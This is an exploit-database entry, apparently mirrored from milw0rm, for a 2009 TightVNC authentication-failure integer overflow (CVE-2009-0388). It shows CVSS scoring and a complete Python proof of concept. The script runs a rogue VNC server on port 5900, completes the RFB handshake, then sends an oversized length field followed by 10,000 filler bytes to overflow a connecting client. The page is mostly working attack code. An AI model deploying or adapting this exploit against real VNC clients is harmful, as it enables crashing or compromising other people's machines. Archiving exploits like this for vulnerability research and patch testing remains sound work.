Lucene search

K
exploitpackDesiEXPLOITPACK:046B5BBA5585B91D4D6433FE36142DC8
HistoryFeb 09, 2009 - 12:00 a.m.

TightVNC - Authentication Failure Integer Overflow (PoC)

2009-02-0900:00:00
desi
7

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

TightVNC - Authentication Failure Integer Overflow (PoC)

#!/usr/bin/env python

#[email protected]

# Modified  Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388

import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
		clientsocket, clientaddres = serversocket.accept()
		
		data = 'RFB 003.008\n'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print data_cli

		data = '\x02\x02\x10'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)

		data = '\x00'*4
		clientsocket.sendall(data)

		data = ('\x00'*3)+'\x01'
		clientsocket.sendall(data)

		data = ('\x00'*3)+'\x02STDVVNCAUTH_'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)

		data = ('\x01'*16)
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		
		data = '\x00\x00\x00\x01'
		clientsocket.sendall(data)

		data = '\xf0\xff\xff\xff'
		clientsocket.sendall(data)

		data = 'A'*10000
		clientsocket.sendall(data)

clientsocket.close()
serversocket.close()

# milw0rm.com [2009-02-09]

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C